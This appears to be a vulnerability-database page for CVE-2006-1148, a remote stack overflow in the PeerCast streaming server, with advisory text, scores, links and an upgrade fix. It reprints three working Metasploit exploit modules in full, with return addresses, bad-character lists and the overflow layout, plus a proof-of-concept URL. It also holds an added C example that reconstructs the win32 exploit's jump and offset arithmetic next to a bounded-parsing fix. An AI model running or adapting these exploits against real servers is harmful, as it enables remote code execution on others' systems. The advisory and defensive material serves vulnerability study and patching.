CVE-2006-1148
CVSS 7.5
Published: 2006-03-10 06:02:00
Revised: 2011-09-06 00:00:00

[Original] Multiple stack-based buffer overflows in the procConnectArgs function in servmgr.cpp in PeerCast before 0.1217 allow remote attackers to execute arbitrary code via an HTTP GET request with a long (1) parameter name or (2) value in a URL, which triggers the overflow in the nextCGIarg function in servhs.cpp.


[CNNVD] Peercast.org PeerCast URL Handling Remote Buffer Overflow Vulnerability (CNNVD-200603-197)

        PeerCast is a simple, easy-to-use audio/video streaming server.
        The procConnectArgs function in servmgr.cpp, part of PeerCast's URL-handling code, contains a stack buffer overflow: nextCGIarg in servhs.cpp copies a query-string parameter name or value into fixed-size buffers without checking its length. A remote attacker can exploit this with a single unauthenticated HTTP GET request to execute arbitrary code on the server.
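As an added illustration of the bug class (this is not PeerCast's servhs.cpp/servmgr.cpp source; the function names, the 64-byte buffer size and the sample query strings are assumptions made for this example), the C below shows the unbounded name/value copy the advisory describes next to a bounded version that rejects an oversized token instead of overrunning the caller's stack frame:

```c
/*
 * Added example for CVE-2006-1148: a CGI-argument splitter that copies
 * "name=value&name=value" tokens into caller-supplied stack buffers.
 * Reconstruction of the pattern, NOT PeerCast's code; names and the
 * ARG_BUF size are assumptions.
 */
#include <stdio.h>
#include <string.h>

#define ARG_BUF 64   /* assumed capacity of the caller's name/value buffers */

/* Vulnerable form: copies until '=' / '&' with no knowledge of how large
 * cmd/arg are. A name or value longer than the caller's buffer overwrites
 * the rest of the frame (saved EBP, return address). Shown for contrast;
 * only called here with input that is known to fit. */
static const char *next_cgi_arg_vulnerable(const char *cp, char *cmd, char *arg)
{
    if (!*cp)
        return NULL;
    while (*cp) {                      /* parameter name, up to '=' */
        char c = *cp++;
        if (c == '=')
            break;
        *cmd++ = c;
    }
    *cmd = '\0';
    while (*cp) {                      /* value, up to '&' */
        char c = *cp++;
        if (c == '&')
            break;
        *arg++ = c;
    }
    *arg = '\0';
    return cp;
}

/* Hardened form: the caller passes both capacities. A token that would not
 * fit (including its NUL) sets *err and returns NULL, so the request is
 * rejected rather than silently truncated or written past the buffer. */
static const char *next_cgi_arg_safe(const char *cp, char *cmd, size_t cmdsz,
                                     char *arg, size_t argsz, int *err)
{
    size_t n;
    *err = 0;
    if (!cp || !*cp)
        return NULL;
    for (n = 0; *cp && *cp != '='; cp++) {
        if (n + 1 >= cmdsz) { *err = 1; return NULL; }
        cmd[n++] = *cp;
    }
    cmd[n] = '\0';
    if (*cp == '=')
        cp++;
    for (n = 0; *cp && *cp != '&'; cp++) {
        if (n + 1 >= argsz) { *err = 1; return NULL; }
        arg[n++] = *cp;
    }
    arg[n] = '\0';
    if (*cp == '&')
        cp++;
    return cp;
}

/* Parse a whole query string with the safe splitter. Returns the number of
 * parameters, or -1 if any name or value exceeds ARG_BUF - 1 bytes.
 * longest_name / longest_value may be NULL. */
int parse_query_safe(const char *query, int *longest_name, int *longest_value)
{
    char cmd[ARG_BUF], arg[ARG_BUF];
    int count = 0, err = 0;
    const char *cp = query;
    if (longest_name) *longest_name = 0;
    if (longest_value) *longest_value = 0;
    while ((cp = next_cgi_arg_safe(cp, cmd, sizeof cmd, arg, sizeof arg, &err)) != NULL) {
        int nl = (int)strlen(cmd), vl = (int)strlen(arg);
        if (longest_name && nl > *longest_name) *longest_name = nl;
        if (longest_value && vl > *longest_value) *longest_value = vl;
        count++;
    }
    return err ? -1 : count;
}

/* n bytes of 'A' and no '=': one overlong parameter NAME, the shape of the
 * advisory's 800-byte proof of concept (input constructed here). */
int parse_long_name(size_t n)
{
    char buf[2048];
    if (n >= sizeof buf) n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return parse_query_safe(buf, NULL, NULL);
}

/* "v=" followed by n bytes of 'B': one overlong parameter VALUE. */
int parse_long_value(size_t n)
{
    char buf[2048];
    if (n >= sizeof buf - 2) n = sizeof buf - 3;
    buf[0] = 'v'; buf[1] = '=';
    memset(buf + 2, 'B', n);
    buf[n + 2] = '\0';
    return parse_query_safe(buf, NULL, NULL);
}

/* On well-formed, in-bounds input both splitters agree; only the oversized
 * case differs (UB in one, a clean rejection in the other). */
int parsers_agree(const char *query)
{
    char c1[ARG_BUF], a1[ARG_BUF], c2[ARG_BUF], a2[ARG_BUF];
    int err;
    const char *p1 = next_cgi_arg_vulnerable(query, c1, a1);
    const char *p2 = next_cgi_arg_safe(query, c2, sizeof c2, a2, sizeof a2, &err);
    return p1 && p2 && !err && strcmp(c1, c2) == 0 && strcmp(a1, a2) == 0
           && strcmp(p1, p2) == 0;
}

int main(void)
{
    int ln, lv;
    int n = parse_query_safe("id=123&name=abc", &ln, &lv);
    printf("parsed %d params, longest name %d, longest value %d\n", n, ln, lv);
    printf("800-byte name: %s\n", parse_long_name(800) < 0 ? "rejected" : "accepted");
    return 0;
}
```

The fix in 0.1217 is not shown on this page; the bounded splitter above is one correct shape for it: capacities travel with the buffers, and a token that does not fit fails the whole request, which is the only safe outcome for a length-unknown input reaching a fixed-size stack buffer.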

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no special access conditions required]
Access vector: [--]
Authentication: NONE [no authentication required]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:peercast:peercast:0.1212
cpe:/a:peercast:peercast:0.1215
cpe:/a:peercast:peercast:0.1211

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1148
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1148
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-197
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/17040
(PATCH)  BID  17040
http://www.securityfocus.com/archive/1/archive/1/427160/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060309 INFIGO-2006-03-01: PeerCast streaming server remote buffer overflow
http://www.infigo.hr/in_focus/INFIGO-2006-03-01
(VENDOR_ADVISORY)  MISC  http://www.infigo.hr/in_focus/INFIGO-2006-03-01
http://xforce.iss.net/xforce/xfdb/25113
(UNKNOWN)  XF  peercast-url-bo(25113)
http://www.vupen.com/english/advisories/2006/0900
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0900
http://www.peercast.org/forum/viewtopic.php?t=3346
(UNKNOWN)  CONFIRM  http://www.peercast.org/forum/viewtopic.php?t=3346
http://www.osvdb.org/23777
(UNKNOWN)  OSVDB  23777
http://security.gentoo.org/glsa/glsa-200603-17.xml
(UNKNOWN)  GENTOO  GLSA-200603-17
http://secunia.com/advisories/19291
(VENDOR_ADVISORY)  SECUNIA  19291
http://secunia.com/advisories/19169
(UNKNOWN)  SECUNIA  19169

- Vulnerability information (CNNVD)

Peercast.org PeerCast URL Handling Remote Buffer Overflow Vulnerability
High risk  Buffer overflow
Published: 2006-03-10 00:00:00  Updated: 2012-12-26 00:00:00
Remote
        PeerCast is a simple, easy-to-use audio/video streaming server.
        The procConnectArgs function in servmgr.cpp, part of PeerCast's URL-handling code, contains a stack buffer overflow: nextCGIarg in servhs.cpp copies a query-string parameter name or value without a length check. A remote attacker can exploit it to execute arbitrary code on the server.

- Advisory and patch

        The vendor has released an upgrade that fixes this issue. It can be obtained from:
        peercast.org PeerCast v0.1217
        http://www.peercast.org/download.php

- Vulnerability information (10027)

PeerCast <= 0.1216 (EDBID:10027)
Platform: linux  Type: remote
Date: 2006-03-08  Verified
Port: 7144  Author: MC
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',
			'Description'    => %q{
				This module exploits a stack overflow in PeerCast <= v0.1216. 
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
					
			},
			'Author'         => [ 'MC' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-1148'],
	  				['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 200,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'MinNops'  => 64,
				},
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        => 
				[
					['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))
			
			register_options( [ Opt::RPORT(7144) ], self.class )
	end

	def exploit
		connect

		# Frame layout, per the target table: 780 filler bytes reach the saved
		# return address of the vulnerable frame, which is overwritten with
		# 0x080922f7, an address inside the PeerCast 0.1212 binary itself (a
		# non-PIE i386 ELF loads at a fixed address, so it is stable across
		# runs). The encoded payload follows immediately after it.
		pat = rand_text_alphanumeric(780)
		pat << [target.ret].pack('V')   # 32-bit little-endian
		pat << payload.encoded

		# The whole pattern travels as one query-string token of /stream/.
		# BadChars above keep bytes that would end the request line or the
		# token (NUL, LF, CR, space, '/', '=', ';') out of the encoded payload.
		uri = '/stream/?' + pat

		res = "GET #{uri} HTTP/1.0\r\n\r\n"

		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)

		handler
		disconnect
	end

end
		

- Vulnerability information (16786)

PeerCast <= 0.1216 URL Handling Buffer Overflow (win32) (EDBID:16786)
Platform: windows  Type: remote
Date: 2010-09-20  Verified
Port: 7144  Author: metasploit
##
# $Id: peercast_url.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in PeerCast <= v0.1216.
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-1148'],
					['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
					['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
					['Windows XP English SP0/SP1',   { 'Ret' => 0x77dbfa2c }],
					['Windows XP English SP0/SP2',   { 'Ret' => 0x77dc12b8 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))

		register_options( [ Opt::RPORT(7144) ], self.class )
	end

	def exploit
		connect

		# 1024-byte pattern filled in by offset rather than appended:
		#   300: encoded payload (up to 400 bytes, per 'Space')
		#   768: return address from the target table, little-endian
		#   812: E9 <rel32 -517>, a 5-byte near jmp back to offset 300
		#        (812 + 5 - 517 == 300)
		# The layout assumes control reaches offset 812 after the overwritten
		# return and is then redirected back into the payload below it.
		pat = rand_text_alphanumeric(1024)
		pat[768, 4] = [target.ret].pack('V')
		pat[812, 5] = [0xe9, -517].pack('CV')
		pat[300, payload.encoded.length] = payload.encoded

		uri = '/stream/?' + pat

		res = "GET #{uri} HTTP/1.0\r\n\r\n"

		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)
		sock.close

		handler
		disconnect
	end

end
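The offset arithmetic in the win32 module above is worth checking by hand. The C below is an added example (not Metasploit's or PeerCast's code): the offsets 300, 768 and 812, the -517 displacement, the 400-byte Space and the XP SP0/SP1 return address are taken from the module; the filler byte, the dummy NOP payload and the helper names are this example's own. It encodes the same E9 rel32 near jump, decodes it back, and confirms that the payload region cannot run into the return address:

```c
/*
 * Added example: rebuild the 1024-byte layout of the win32 module and verify
 * its offset arithmetic. Offsets and values come from the module; everything
 * else (filler byte, dummy payload, helper names) is assumed here.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PAT_LEN       1024
#define PAYLOAD_OFF   300   /* pat[300, payload.length] = payload.encoded */
#define RET_OFF       768   /* pat[768, 4] = [target.ret].pack('V')       */
#define JMP_OFF       812   /* pat[812, 5] = [0xe9, -517].pack('CV')      */
#define PAYLOAD_SPACE 400   /* 'Space' => 400 in the module's payload options */

/* Little-endian 32-bit store/load: the byte order Ruby's pack('V') produces. */
static void write_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
uint32_t read_le32(const uint8_t *buf, size_t at)
{
    return (uint32_t)buf[at] | (uint32_t)buf[at + 1] << 8
         | (uint32_t)buf[at + 2] << 16 | (uint32_t)buf[at + 3] << 24;
}

/* x86 near jmp: E9 followed by a signed 32-bit displacement measured from
 * the END of the 5-byte instruction, so rel = target - (jmp_addr + 5).
 * Unsigned subtraction wraps to the two's-complement form of a negative rel. */
void encode_jmp_rel32(uint8_t out[5], uint32_t jmp_addr, uint32_t target)
{
    out[0] = 0xE9;
    write_le32(out + 1, target - (jmp_addr + 5));
}

/* Signed displacement carried by the jmp at `at`. */
int32_t jmp_rel32_value(const uint8_t *buf, size_t at)
{
    return (int32_t)read_le32(buf, at + 1);
}

/* Where the jmp at `at` lands, or -1 if the byte there is not E9. */
int64_t decode_jmp_target(const uint8_t *buf, size_t at)
{
    if (buf[at] != 0xE9)
        return -1;
    return (int64_t)at + 5 + jmp_rel32_value(buf, at);
}

/* Bytes between the payload start and the return address: a payload longer
 * than this would overwrite target.ret. */
size_t payload_room(void)
{
    return RET_OFF - PAYLOAD_OFF;
}

/* Build the pattern: filler, payload at 300, ret at 768, jmp-back at 812.
 * Returns the number of payload bytes placed (clamped to the room). */
size_t build_pattern(uint8_t pat[PAT_LEN], uint32_t ret, const uint8_t *payload, size_t plen)
{
    memset(pat, 'A', PAT_LEN);                 /* filler; the module uses random alnum */
    if (plen > payload_room())
        plen = payload_room();
    memcpy(pat + PAYLOAD_OFF, payload, plen);
    write_le32(pat + RET_OFF, ret);
    encode_jmp_rel32(pat + JMP_OFF, JMP_OFF, PAYLOAD_OFF);
    return plen;
}

int main(void)
{
    uint8_t pat[PAT_LEN], nops[PAYLOAD_SPACE];
    memset(nops, 0x90, sizeof nops);           /* dummy payload: NOP sled, constructed here */
    build_pattern(pat, 0x77dbfa2cu, nops, sizeof nops);   /* ret of the module's XP SP0/SP1 target */
    printf("jmp @%d: %02x %02x %02x %02x %02x  rel32=%d  lands at %lld\n", JMP_OFF,
           pat[JMP_OFF], pat[JMP_OFF + 1], pat[JMP_OFF + 2], pat[JMP_OFF + 3], pat[JMP_OFF + 4],
           jmp_rel32_value(pat, JMP_OFF), (long long)decode_jmp_target(pat, JMP_OFF));
    printf("payload room %zu bytes, Space %d: %s\n", payload_room(), PAYLOAD_SPACE,
           payload_room() >= PAYLOAD_SPACE ? "ok" : "OVERLAP");
    return 0;
}
```

The room between offsets 300 and 768 is 468 bytes, so the module's 400-byte Space stays clear of the return address; raising Space past 468 without moving the payload would silently corrupt target.ret, which is the kind of check worth automating before changing any of these offsets.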
		

- Vulnerability information (16855)

PeerCast <= 0.1216 URL Handling Buffer Overflow (linux) (EDBID:16855)
Platform: linux  Type: remote
Date: 2010-09-20  Verified
Port: 0  Author: metasploit
##
# $Id: peercast_url.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in PeerCast <= v0.1216.
				The vulnerability is caused due to a boundary error within the
				handling of URL parameters.
			},
			'Author'         => [ 'MC' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-1148'],
					['OSVDB', '23777'],
					['BID', '17040'],
					['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 200,
					'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
					'MinNops'  => 64,
				},
			'Platform'       => 'linux',
			'Arch'           => ARCH_X86,
			'Targets'        =>
				[
					['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
				],
			'DisclosureDate' => 'Mar 8 2006'))

		register_options([
			Opt::RPORT(7144)
		], self.class)
	end

	def exploit
		connect

		pat = rand_text_alphanumeric(780)
		pat << [target.ret].pack('V')
		pat << payload.encoded

		uri = '/stream/?' + pat

		res = "GET #{uri} HTTP/1.0\r\n\r\n"

		print_status("Trying target address 0x%.8x..." % target.ret)
		sock.put(res)

		handler
		disconnect
	end

end
		

- Vulnerability information (F82238)

PeerCast 0.1216 Buffer Overflow (PacketStormID:F82238)
Date: 2009-10-27 00:00:00
Author: MC
Tags: exploit, overflow
CVE-2006-1148

This Metasploit module exploits a stack overflow in PeerCast versions 0.1216 and below. The vulnerability is caused due to a boundary error within the handling of URL parameters.

(Module source identical to the EDB 10027 listing above.)

- Vulnerability information (OSVDB)

OSVDB ID: 23777
PeerCast procConnectArgs() Function URL Handling Remote Overflow
Location: Remote / Network Access  Attack type: Input Manipulation
Impact: Loss of Integrity  Solution: Upgrade
Exploit: Public  Disclosure: Vendor Verified

- Description

A remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2006-03-09 Unknown
2006-03-11 Unknown

- Solution

Upgrade to version 0.1217 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.


- Vulnerability information (Bugtraq)

Peercast.org PeerCast Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error  Bugtraq ID: 17040
Remote: Yes  Local: No
Published: 2006-03-09 12:00:00  Updated: 2009-04-21 06:46:00
Discovered by infocus <infocus@infigo.hr>.

- Affected versions

peercast.org PeerCast 0.1212
peercast.org PeerCast 0.1211
peercast.org PeerCast 0.1215
Gentoo Linux
peercast.org PeerCast 0.1217

- Not affected versions

peercast.org PeerCast 0.1217

- Discussion

PeerCast is prone to a remote buffer-overflow vulnerability. A remote attacker could exploit this issue to execute arbitrary code.

PeerCast 0.1215 and earlier are vulnerable.

- Exploit

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A proof of concept is available:

http://www.example.com/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)

Sample exploit code has been provided:

- Solution

The vendor has released PeerCast 0.1217 to address this issue. Please see the referenced advisories for more information and fixes.


peercast.org PeerCast 0.1215

peercast.org PeerCast 0.1211

peercast.org PeerCast 0.1212


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.